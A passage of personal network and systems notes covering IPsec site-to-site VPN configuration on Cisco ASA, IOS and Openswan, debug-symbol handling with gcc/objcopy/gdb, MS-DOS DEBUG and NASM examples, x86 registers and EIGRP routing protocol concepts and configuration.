destination static OUTSIDE_NET OUTSIDE_NET
ASA-1(config)# sysopt connection permit-vpn ! permit-ipsec or use an outside ACL
ASA-2(config)# crypto ikev1 policy 1 ! crypto isakmp
ASA-2(config-ikev1-policy)# authentication pre-share
ASA-2(config-ikev1-policy)# encryption aes
ASA-2(config-ikev1-policy)# hash sha
ASA-2(config-ikev1-policy)# group 2
ASA-2(config-ikev1-policy)# lifetime 86400
ASA-2(config)# crypto ikev1 am-disable
ASA-2(config)# crypto ikev1 enable outside ! crypto isakmp
ASA-2(config)# tunnel-group 12.12.12.1 type ipsec-l2l
ASA-2(config)# tunnel-group 12.12.12.1 ipsec-attributes
ASA-2(config-tunnel-ipsec)# pre-shared-key SECRET_KEY
ASA-2(config)# access-list CRYPTO_ACL permit ip 192.168.2.0 255.255.255.0 192.168.1.0 255.255.255.0
ASA-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ASA-2(config)# crypto map CRYPTO_MAP 1 set peer 12.12.12.1
ASA-2(config)# crypto map CRYPTO_MAP 1 match address CRYPTO_ACL
ASA-2(config)# crypto map CRYPTO_MAP 1 set transform-set TRANSFORM_SET
ASA-2(config)# crypto map CRYPTO_MAP 1 set pfs group2
ASA-2(config)# crypto map CRYPTO_MAP interface outside
ASA-2(config)# route outside 192.168.1.0 255.255.255.0 12.12.12.1
ASA-2(config)# object network INSIDE_NET
ASA-2(config-network-object)# subnet 192.168.2.0 255.255.255.0
ASA-2(config)# object network OUTSIDE_NET
ASA-2(config-network-object)# subnet 192.168.1.0 255.255.255.0
ASA-2(config)# nat (inside,outside) source static INSIDE_NET INSIDE_NET
destination static OUTSIDE_NET OUTSIDE_NET
ASA-2(config)# sysopt connection permit-vpn ! permit-ipsec or use an outside ACL

Between two IOS routers

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# ip access-list extended CRYPTO_ACL
ROUTER-1(config-ext-nacl)# permit ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-1(config-crypto-map)# set peer 12.12.12.2
ROUTER-1(config-crypto-map)# match address CRYPTO_ACL
ROUTER-1(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-1(config-crypto-map)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NONAT
ROUTER-1(config-ext-nacl)# deny ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload
ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# ip access-list extended CRYPTO_ACL
ROUTER-2(config-ext-nacl)# permit ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-2(config-crypto-map)# set peer 12.12.12.1
ROUTER-2(config-crypto-map)# match address CRYPTO_ACL
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NONAT
ROUTER-2(config-ext-nacl)# deny ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload

Between two Openswan servers

LINUX-1# route add default gw 12.12.12.2
LINUX-1# echo 1 > /proc/sys/net/ipv4/ip_forward
LINUX-1# iptables -t nat -I POSTROUTING -s 192.168.1.0/24 -d 192.168.2.0/24 -j ACCEPT
LINUX-1# iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to 12.12.12.1 -o eth0
LINUX-1# cat /etc/ipsec.conf
version 2.0
config setup
 dumpdir=/var/run/pluto/
 nat_traversal=no
 oe=off
 protostack=netkey
conn LINUX-2
 type=tunnel
 left=12.12.12.1
 leftsubnet=192.168.1.0/24
 right=12.12.12.2
 rightsubnet=192.168.2.0/24
 authby=secret
 pfs=yes
 aggrmode=no
 ike="aes128-sha1-modp1024"
 phase2alg="aes128-sha1;modp1024"
 auto=start
LINUX-1# cat /var/lib/openswan/ipsec.secrets.inc 
12.12.12.1 12.12.12.2 : PSK "SECRET_KEY"
LINUX-1# service ipsec start
LINUX-2# route add default gw 12.12.12.1
LINUX-2# echo 1 > /proc/sys/net/ipv4/ip_forward
LINUX-2# iptables -t nat -I POSTROUTING -s 192.168.2.0/24 -d 192.168.1.0/24 -j ACCEPT
LINUX-2# iptables -t nat -A POSTROUTING -s 192.168.2.0/24 -j SNAT --to 12.12.12.2 -o eth0
LINUX-2# cat /etc/ipsec.conf
version 2.0
config setup
 dumpdir=/var/run/pluto/
 nat_traversal=no
 oe=off
 protostack=netkey
conn LINUX-1
 left=12.12.12.1
 leftsubnet=192.168.1.0/24
 right=12.12.12.2
 rightsubnet=192.168.2.0/24
 authby=secret
 pfs=yes
 aggrmode=no
 ike="aes128-sha1-modp1024"
 phase2alg="aes128-sha1;modp1024"
 auto=start
LINUX-2# cat /var/lib/openswan/ipsec.secrets.inc 
12.12.12.1 12.12.12.2 : PSK "SECRET_KEY"
LINUX-2# service ipsec start

# Working with symbols files


What is a symbols file?

File containing a table of the identifiers information relating to its declaration and location.


Compiling with or without debugging information for GDB

# gcc -o example_debug -ggdb example.c
# gcc -o example_nodebug example.c

Listing symbols from object file

# nm example_debug

Three columns: Virtual_address | Symbol_type | Symbol_name
Lowercase symbols types are local and uppercase are global (external).

Copying debug symbols to an external file

# objcopy --only-keep-debug example_debug example.dbg

Striping debug symbols added with -ggdb

# objcopy --strip-debug example_debug

Striping all symbols information unneeded

# objcopy --strip-debug --strip-unneeded example_debug

Adding debug symbols to a binary

# gdb example_nodebug
(gdb) symbol-file example.dbg

or

# objcopy --add-gnu-debuglink=example.dbg example_nodebug
# gdb example_nodebug

Debugging a core file

# gdb example corefile
(gdb) symbol-file example.dbg
(gdb) bt

# MS-DOS debug

C:\> type CharColor.asm
segment DATA
        Asterisk db '*'
        Color    db 0f0h ; white background and black foreground
        Position dw 3280 ; 20x160b + 80*2b (line 20, col 40)

segment STACK stack
        resb 256
        StackPointer:

segment CODE
        ..start:

        mov ax, STACK
        mov ss, ax
        mov sp, StackPointer

        mov ax, DATA
        mov ds, ax
        mov ax, 0b800h
        mov es, ax
        mov al, [Asterisk]
        mov ah, [Color]
        mov bx, [Position]
        mov [es:bx], ax
        mov word [es:5*160+35*2], 00a41h

        mov ah, 4ch
        int 21h
C:\> nasm   CharColor.asm -f obj
C:\> alink  CharColor.obj -o CharColor.exe
C:\> dir /x CharColor.exe
C:\> debug  CHARCO~1.EXE
-?
assemble     A [dirección]
compare      C intervalo de direcciones
dump         D [intervalo]
enter        E dirección [lista]
fill         F lista de rango
go           G [=dirección] [direcciones]
hex          H valor1 valor2
input        I puerto
load         L [dirección] [unidad] [primer sector] [número]
move         M intervalo de direcciones
name         N [ruta] [lista de argumentos]
output       O byte de puerto
proceed      P [=dirección] [número]
quit         Q
register     R [registro]
search       S lista de rango
trace        T [=dirección] [valor]
unassemble   U [intervalo]
write        W [dirección] [unidad] [primer sector] [número]
allocate expanded memory        XA [N.páginas]
deallocate expanded memory      XD [identificador]
map expanded memory pages       XM [páginaL] [páginaP] [identificador]
display expanded memory status  XS
-

Unassemble

-u 0 29
158A:0000 B87A15        MOV     AX,157A
158A:0003 8ED0          MOV     SS,AX
158A:0005 BC0001        MOV     SP,0100
158A:0008 B87915        MOV     AX,1579
158A:000B 8ED8          MOV     DS,AX
158A:000D B800B8        MOV     AX,B800
158A:0010 8EC0          MOV     ES,AX
158A:0012 A00000        MOV     AL,[0000]
158A:0015 8A260100      MOV     AH,[0001]
158A:0019 8B1E0200      MOV     BX,[0002]
158A:001D 26            ES:
158A:001E 8907          MOV     [BX],AX
158A:0020 26            ES:
158A:0021 C7066603410A  MOV     WORD PTR [0366],0A41
158A:0027 B44C          MOV     AH,4C
158A:0029 CD21          INT     21

Dump

-d 1579:0
1579:0000  2A F0 D0 0C 00 00 00 00-00 00 00 00 00 00 00 00   *...............
1579:0010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0020  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0030  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0060  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0070  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................

Register Status

-r
AX=0000  BX=FFFF  CX=FF8B  DX=0000  SP=0100  BP=0000  SI=0000  DI=0000
DS=1569  ES=1569  SS=157A  CS=158A  IP=0000   NV UP EI PL NZ NA PO NC
158A:0000 B87A15        MOV     AX,157A

Go and modify a register

-g 19
AX=F02A  BX=FFFF  CX=FF8B  DX=0000  SP=0100  BP=0000  SI=0000  DI=0000
DS=1579  ES=B800  SS=157A  CS=158A  IP=0019   NV UP EI PL NZ NA PO NC
158A:0019 8B1E0200      MOV     BX,[0002]                          DS:0002=0CD0
-r ax
AX F02A
:f041

Proceed next program instruction

-g 27
AX=F02A  BX=0CD0  CX=FF8B  DX=0000  SP=0100  BP=0000  SI=0000  DI=0000
DS=1579  ES=B800  SS=157A  CS=158A  IP=0027   NV UP EI PL NZ NA PO NC
158A:0027 B44C          MOV     AH,4C
-p
AX=4C2A  BX=0CD0  CX=FF8B  DX=0000  SP=0100  BP=0000  SI=0000  DI=0000
DS=1579  ES=B800  SS=157A  CS=158A  IP=0029   NV UP EI PL NZ NA PO NC
158A:0029 CD21          INT     21
-p

El programa ha terminado de forma normal

Trace next instruction

-g 27
AX=F02A  BX=0CD0  CX=FF8B  DX=0000  SP=0100  BP=0000  SI=0000  DI=0000
DS=1579  ES=B800  SS=157A  CS=158A  IP=0027   NV UP EI PL NZ NA PO NC
158A:0027 B44C          MOV     AH,4C
-t
AX=4C2A  BX=0CD0  CX=FF8B  DX=0000  SP=0100  BP=0000  SI=0000  DI=0000
DS=1579  ES=B800  SS=157A  CS=158A  IP=0029   NV UP EI PL NZ NA PO NC
158A:0029 CD21          INT     21
-t
AX=4C2A  BX=0CD0  CX=FF8B  DX=0000  SP=00FA  BP=0000  SI=0000  DI=0000
DS=1579  ES=B800  SS=157A  CS=00A7  IP=107C   NV UP DI PL NZ NA PO NC
00A7:107C 90            NOP

Enter (memory modification)

-g 0d
AX=1579  BX=FFFF  CX=FF8B  DX=0000  SP=0100  BP=0000  SI=0000  DI=0000
DS=1579  ES=1569  SS=157A  CS=158A  IP=000D   NV UP EI PL NZ NA PO NC
158A:000D B800B8        MOV     AX,B800
-d ds:0
1579:0000  2A F0 D0 0C 00 00 00 00-00 00 00 00 00 00 00 00   *...............
1579:0010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0020  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0030  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0060  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0070  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
-e ds:0 'A'
-e b800:0 'h' f0 'e' 0f 'l' f0 'l' 0f 'o' f0


Assemble new instructions (code modification)

-a 20
158A:0020 inc bx
158A:0021 inc bx
158A:0022 es:
158A:0023 mov [bx], ax
158A:0025 mov ah, 4c
158A:0027 int 21
158A:0029

# NASM Hello world

C:\> type HelloDOS.asm
segment DATA
        Greeting db 'Hello DOS!$'

segment STACK stack
        resb 256
        StackPointer:

segment CODE
        ..start:

        mov ax, STACK
        mov ss, ax
        mov sp, StackPointer

        mov ax, DATA
        mov ds, ax
        mov dx, Greeting
        mov ah, 9
        int 21h

        mov ah, 4ch
        int 21h
C:\> nasm  HelloDOS.asm -f obj
C:\> alink HelloDOS.obj -o HelloDOS.exe
C:\> HelloDOS.exe

# x86 architecture

Registers

CS: Code Segment
IP: Instruction Pointer (EIP/RIP)
DS: Data Segment
AX: Accumulator (AL/AH/./EAX/RAX)
BX: Base (BL/BH/./EBX/RBX)
CX: Counter (CL/CH/./ECX/RCX)
DX: Data (DL/DH/./EDX/RDX)
SI: Source Index (SIL/./ESI/RSI)
DI: Destination Index (DSIL/./EDI/RDI)
R8: (R8B/R8W/R8D/.)
R9: (R9B/R9W/R9D/.)
R10: (R10B/R10W/R10D/.)
R11: (R11B/R11W/R11D/.)
R12: (R12B/R12W/R12D/.)
R13: (R13B/R13W/R13D/.)
R14: (R14B/R14W/R14D/.)
R15: (R15B/R15W/R15D/.)
ES: Extra Segment (Data)
FS: Extra Segment (Data)
GS: Extra Segment (Data)
SS: Stack Segment
BP: Base Pointer (BPL/./EBP/RBP)
SP: Stack Pointer (SPL/./ESP/RSP)

Operating modes

Real mode

- 16-bit registers
- 1MB of memory can be addressed (16-bit --> 20-bit)
- Sub-modes: plain (CS=DS=SS=64KB) or segmented (CS=SS=64KB and multiple data segments of 64 KB)

Protected mode

- 32-bit registers
- 4GB of memory can be addressed
- Boot process: real mode --> protected mode (backward compatibility)
- Plain memory (no segments --> descriptors)
- Sub-mode: virtual 8086 (run real mode programs under a protected mode supervisor OS).

Long mode

- 64-bit registers
- 16EB of memory can be addresses
- Plain memory (no segments)

# EIGRP

EIGRP Basics and Steady-State Operation

- Transport: IP protocol 88 (does not use UDP or TCP)
- Metric: bandwidth + delay (by default) and load + reliability + MTU (optionally)
- Hello interval
- Hold timer
- Update destination: 224.0.0.10
- Full updates: when neighbors are discovered
- Partial updates: otherwise
- Authentication: only MD5
- VLSM: supported
- Route tags: routes redistributed into EIGRP
- Next-hop field: advertisement of routes with a different next-hop router
- Manual summarization
- Multiprotocol: IP, IPX and AppleTalk

Hellos, Neighbors, and Adjacencies

Two EIGRP neighbors become adjacents when:

- Pass the authentication process
- Use the same AS number
- Believe that the source IP of a received Hello is in the same subnet
- K values match (metric wights tos k1 k2 k3 k4 k5)

Hello and Hold time paremeters do not need to match for EIGRP neighbor relationship to form. When monitoring a neighbor relationship, a router uses each neighbor's stated timers.

EIGRP Updates

Sequence:

- Initially full updates are sent.
- Future partials updates occur when one or more routes change.
- If a neighbor fails, recovers or a new adjacency is formed, full updates are sent.

EIGRP uses RTP (Reliable Transport Protocol) to send multicast updates, waiting on a unicast EIGRP ACK from each neighbor.
If a neighbor fails to acknowledge the update then RTP resends a unicast update.
A SRTT (Smoothed Round-Trip Time) is calculated for each neighbor and a RTO (Retransmission TimeOut) from each SRTT. Both values are shown in the show ip eigrp neighbor. If the RTO expires before the acknowledge reception then a unicast update is sent.
Each acknowledge has a window size of one message and a sequence number.

The EIGRP Topology Table

EIGRP uses 3 tables: neighbor, topology and IP routing table.
The bandwidth and delay sub-interface commands set manually the default EIGRP metrics.
The neighbor's metric for a route is called the reported distance (RD).
The feasible distance (FD) is the router's best calculated metric among all posible routes for a particular prefix.
The route with the FD is called the successor route (placed in the IP routing table).

EIGRP Convergence

- Reported distance (RD): metric reported by a neighbor router
- Feasible distance (FD): lowest metric to reach a particular subnet
- Feasibility condition (FC): when multiple routes exist, the case in which a RD is lower than the FD
- Successor route (SR): the route with the FD
- Feasible successor (FS): a route that is not de SR but meets the FC.

Input Events and Local Computation

EIGRP sends updates only as a result of changed or new topology information.
For a failed route:

- If a FS routes exists, install the lowest-metric FS route and send updates to neighbors.
- If no FS routes exists, query the neighbors.

Going Active on a Route

When no FS route is found, the EIGRP router goes active for the route.
Once the router is active, EIGRP multicasts Query messages to its neighbors and waits for unicast Reply packets. Both are acknowledged using Ack messages.
When receiving a Query:

- If the router does not have an entry sends a Reply packet stating that it has no route.
- If the router has an entry sends a Reply packet with the details of the route.
- Otherwise, the routers goes active.

Diffusing Update ALgorithm (DUAL) refers to the totality of the logic used by EIGRP to calculate new routes.

Stuck-in-Active

Any router in active state for a route must wait for a Reply to each of its Query messages.
EIGRP includes a timer called Active timer. If expires, the router places the route in a stuck-in-active state and also brings down any neighbors from which no Reply was received.

Limiting Query Scope

- Route summarization: the router immediately replies that it does not have that route.
- Stub routers: non-stub routers do not send Query messages to the stub routers.

EIGRP Configuration Example

R1(config)# router eigrp 1
R1(config-router)# eigrp log-neighbor-changes ! enabled by default
R1(config-router)# network 172.31.0.0 0.0.255.255
R1(config-router)# metric weights 0 0 0 1 0 0 ! delay active
R2(config)# int fa0/0
R2(config-if)# ip hello-interval eigrp 1 2 ! AS and hello-interval
R2(config-if)# ip hold-time eigrp 1 6
R2(config)# router eigrp 1
R2(config-router)# network 172.31.0.0 0.0.255.255
R2(config-router)# metric weights 0 0 0 1 0 0
R4(config)# int s0/0.1 point-to-point
R4(config-if)# bandwidth 64
R4(config-if)# ip bandwidth-percent eigrp 1 150 ! 150% for EIGRP traffic
R4(config)# router eigrp 1
R4(config-router)# passive-interface e0/0 ! no routes learned or advertised on e0/0
R4(config-router)# network 172.31.0.0 0.0.255.255
R4(config-router)# metric weights 0 0 0 1 0 0
R5(config)# router eigrp 1
R5(config-router)# network 172.31.0.0 0.0.255.255
R5(config-router)# eigrp stub connected summary

EIGRP timers

Default hello interval is 5 seconds. For NMBA interfaces with a slow bandwidth, 60 seconds.
The hold time defaults to 3 times the default hello interval (15 or 180 seconds).

EIGRP Load Balancing

EIGRP allows for up to 6 equal-metric routes to be installed into the IP routing table.
The variance _multiplier_ command allows different metrics to be considered equal (metric < _multiplier_*FD). EIGRP allows only FS routes to be considered for addition as a result of using the variance command.

maximum-path {1..6} (default to 4).
traffic-share balanced: more traffic to lower-metric routes.
traffic-share min: only use the lowest-metric route.
traffic-share min across-interfaces: for routes with the same metric choose those with different outgoing interfaces.
no traffic-share: balances evenly across routes.

EIGRP Authentication

EIGRP does not support clear-text authentication.
EIGRP uses MD5 authentication using a key chain. If multiple keys in a key chain overlap in time, EIGRP use the key with the lowest key number.

R1(config)# key chain MYKEYCHAIN
R1(config-keychain)# key 1
R1(config-keychain-key)# key-string MYKEY-1
R1(config-keychain-key)# accept-lifetime 00:00:00 Jan 01 2012 00:00:00 Jan 01 2013
R1(config-keychain-key)# send-lifetime   00:00:00 Jan 01 2012 00:00:00 Jan 01 2013
R1(config-keychain)# key 2
R1(config-keychain-key)# key-string MYKEY-2
R1(config-keychain-key)# accept-lifetime 00:00:00 Jan 01 2013 00:00:00 Jan 01 2014
R1(config-keychain-key)# send-lifetime   00:00:00 Jan 01 2013 00:00:00 Jan 01 2014
R1(config)# int fa0/0
R1(config-if)# ip authentication mode eigrp 1 md5
R1(config-if)# ip authentication key-chain eigrp 1 MYKEYCHAIN

EIGRP Automatic Summarization

EIGRP defaults to use automatic summarization.
Use no auto-summary under router eigrp _asn_ to disable autosummarization.

EIGRP Split Horizon

Split horizon prevents a route from being readvertised out the interface on which it was received.
Most interface types enable split horizon by default.
Can be disabled by using the no ip split-horizon eigrp _asn_ interface subcommand.

EIGRP Route Filtering

Using an ACL:
R1(config)# access-list 1 deny 172.31.196.0 0.0.3.255
R1(config)# access-list 1 permit any
R1(config)# router eigrp 1
R1(config-router)# distribute-list 1 in fa0/0
Using a prefix list:
R1(config)# ip prefix-list MYPREFIXLIST seq 5 deny 172.31.192.0/21 ge 30 le 30
R1(config)# ip prefix-list MYPREFIXLIST seq 10 permit 0.0.0.0/0 le 32
R1(config)# router eigrp 1
R1(config-router)# distribute-list prefix MYPREFIXLIST in fa0/0

An incoming filter prevents information from entering the EIGRP topology table.

EIGRP Offset Lists

Allow to add an offset to a route's metric, either before sending and update, or for routes received in an update, using ACLs.

Clearing the IP Routing Table

clear ip route * clears the IP routing table but the router does not send any EIGRP message. The router simply refills the IP routing table with the information of the topology table.
clear ip eigrp neighbor clears all neighbors relationship, which clears the entire topology table. The neighbors then come back up, send new updates, and repopulate the topology and routing tables.

EIGRP messages

- Hello: identifies neighbors, exchanges parameters, keepalive function
- Update
- Ack: for Update, Query and Reply messages
- Query
- Reply
- Goodbye: to notify a gracefully shutting down